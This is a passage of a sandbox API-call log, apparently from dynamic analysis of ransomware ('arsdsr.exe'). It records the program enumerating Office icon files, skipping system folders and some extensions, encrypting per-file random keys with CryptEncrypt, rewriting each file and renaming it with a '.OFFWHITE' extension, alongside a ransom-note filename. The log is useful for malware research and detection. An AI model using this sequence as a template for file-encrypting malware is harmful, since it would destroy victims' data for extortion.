returned 1 [0144.365] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.365] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1736, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.365] WriteFile (in: hFile=0x21c, lpBuffer=0x52e9b0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e9b0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0144.365] GetProcessHeap () returned 0x500000 [0144.365] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1536) returned 0x55a7b8 [0144.365] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.365] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1536, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x1536, lpOverlapped=0x0) returned 1 [0144.366] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.366] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1536, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x1536, lpOverlapped=0x0) returned 1 [0144.366] GetProcessHeap () returned 0x500000 [0144.366] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0144.366] CloseHandle (hObject=0x21c) returned 1 [0144.367] GetProcessHeap () returned 0x500000 [0144.367] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.367] GetProcessHeap () returned 0x500000 [0144.367] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.367] GetProcessHeap () returned 0x500000 [0144.367] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.367] GetProcessHeap () returned 0x500000 [0144.367] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.367] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" [0144.367] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico.OFFWHITE" [0144.367] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico.offwhite")) returned 1 [0144.368] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2=".") returned 1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="..") returned 1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="...") returned 1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="windows") returned -1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="$recycle.bin") returned 1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="rsa") returned -1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="ntuser.dat") returned -1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="programdata") returned -1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="appdata") returned 1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="program files") returned -1 [0144.368] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="program files (x86)") returned -1 [0144.368] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.368] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\", lpString2="DocumentRepository.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" [0144.368] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.368] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.368] PathFindExtensionW (pszPath="DocumentRepository.ico") returned=".ico" [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.368] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.369] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.369] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.369] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.369] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.369] GetProcessHeap () returned 0x500000 [0144.369] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e9c0 [0144.369] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0144.371] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=25214) returned 1 [0144.371] GetProcessHeap () returned 0x500000 [0144.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.371] GetProcessHeap () returned 0x500000 [0144.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.371] GetProcessHeap () returned 0x500000 [0144.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.371] GetProcessHeap () returned 0x500000 [0144.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.371] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.372] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.372] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.372] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.372] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.372] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.372] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.372] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.372] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x100) returned 1 [0144.372] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.372] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.372] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0144.372] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x627e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.372] SetLastError (dwErrCode=0x0) [0144.373] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.375] GetLastError () returned 0x0 [0144.375] GetLastError () returned 0x0 [0144.375] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x637e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.375] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.375] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x647e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.375] WriteFile (in: hFile=0x21c, lpBuffer=0x52e9c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e9c0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0144.375] GetProcessHeap () returned 0x500000 [0144.375] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x627e) returned 0x5607c8 [0144.375] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.375] ReadFile (in: hFile=0x21c, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x627e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295dec0*=0x627e, lpOverlapped=0x0) returned 1 [0144.378] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.378] WriteFile (in: hFile=0x21c, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x627e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295decc*=0x627e, lpOverlapped=0x0) returned 1 [0144.379] GetProcessHeap () returned 0x500000 [0144.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.379] CloseHandle (hObject=0x21c) returned 1 [0144.379] GetProcessHeap () returned 0x500000 [0144.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.379] GetProcessHeap () returned 0x500000 [0144.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.379] GetProcessHeap () returned 0x500000 [0144.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.379] GetProcessHeap () returned 0x500000 [0144.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.379] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" [0144.379] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.OFFWHITE" [0144.379] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico.offwhite")) returned 1 [0144.380] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0144.380] lstrcmpiW (lpString1="MySharePoints.ico", lpString2=".") returned 1 [0144.380] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="..") returned 1 [0144.380] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="...") returned 1 [0144.380] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="windows") returned -1 [0144.380] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="$recycle.bin") returned 1 [0144.380] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="rsa") returned -1 [0144.380] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="ntuser.dat") returned -1 [0144.381] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="programdata") returned -1 [0144.381] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="appdata") returned 1 [0144.381] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="program files") returned -1 [0144.381] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="program files (x86)") returned -1 [0144.381] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.381] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\", lpString2="MySharePoints.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" [0144.381] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.381] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.381] PathFindExtensionW (pszPath="MySharePoints.ico") returned=".ico" [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.381] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.381] GetProcessHeap () returned 0x500000 [0144.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e9d0 [0144.382] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0144.384] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=348974) returned 1 [0144.384] GetProcessHeap () returned 0x500000 [0144.384] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.384] GetProcessHeap () returned 0x500000 [0144.384] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.384] GetProcessHeap () returned 0x500000 [0144.384] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.384] GetProcessHeap () returned 0x500000 [0144.384] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.384] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.384] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.384] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.384] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.384] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.384] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.384] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.384] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.384] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc90*=0x100) returned 1 [0144.385] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.385] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.385] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0144.385] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5532e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.385] SetLastError (dwErrCode=0x0) [0144.385] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.388] GetLastError () returned 0x0 [0144.388] GetLastError () returned 0x0 [0144.388] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5542e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.388] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.388] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5552e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.388] WriteFile (in: hFile=0x21c, lpBuffer=0x52e9d0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e9d0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0144.388] GetProcessHeap () returned 0x500000 [0144.388] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5532e) returned 0x5607c8 [0144.388] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.389] ReadFile (in: hFile=0x21c, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x5532e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295dec0*=0x5532e, lpOverlapped=0x0) returned 1 [0144.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.413] WriteFile (in: hFile=0x21c, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x5532e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295decc*=0x5532e, lpOverlapped=0x0) returned 1 [0144.414] GetProcessHeap () returned 0x500000 [0144.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.414] CloseHandle (hObject=0x21c) returned 1 [0144.414] GetProcessHeap () returned 0x500000 [0144.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.414] GetProcessHeap () returned 0x500000 [0144.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.414] GetProcessHeap () returned 0x500000 [0144.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.414] GetProcessHeap () returned 0x500000 [0144.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.414] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" [0144.415] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.OFFWHITE" [0144.415] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico.offwhite")) returned 1 [0144.415] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="MySite.ico", cAlternateFileName="")) returned 1 [0144.415] lstrcmpiW (lpString1="MySite.ico", lpString2=".") returned 1 [0144.415] lstrcmpiW (lpString1="MySite.ico", lpString2="..") returned 1 [0144.415] lstrcmpiW (lpString1="MySite.ico", lpString2="...") returned 1 [0144.416] lstrcmpiW (lpString1="MySite.ico", lpString2="windows") returned -1 [0144.416] lstrcmpiW (lpString1="MySite.ico", lpString2="$recycle.bin") returned 1 [0144.416] lstrcmpiW (lpString1="MySite.ico", lpString2="rsa") returned -1 [0144.416] lstrcmpiW (lpString1="MySite.ico", lpString2="ntuser.dat") returned -1 [0144.416] lstrcmpiW (lpString1="MySite.ico", lpString2="programdata") returned -1 [0144.416] lstrcmpiW (lpString1="MySite.ico", lpString2="appdata") returned 1 [0144.416] lstrcmpiW (lpString1="MySite.ico", lpString2="program files") returned -1 [0144.416] lstrcmpiW (lpString1="MySite.ico", lpString2="program files (x86)") returned -1 [0144.416] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.416] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\", lpString2="MySite.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" [0144.416] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.416] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.416] PathFindExtensionW (pszPath="MySite.ico") returned=".ico" [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.416] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.417] lstrcmpiW (lpString1="MySite.ico", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.417] GetProcessHeap () returned 0x500000 [0144.417] 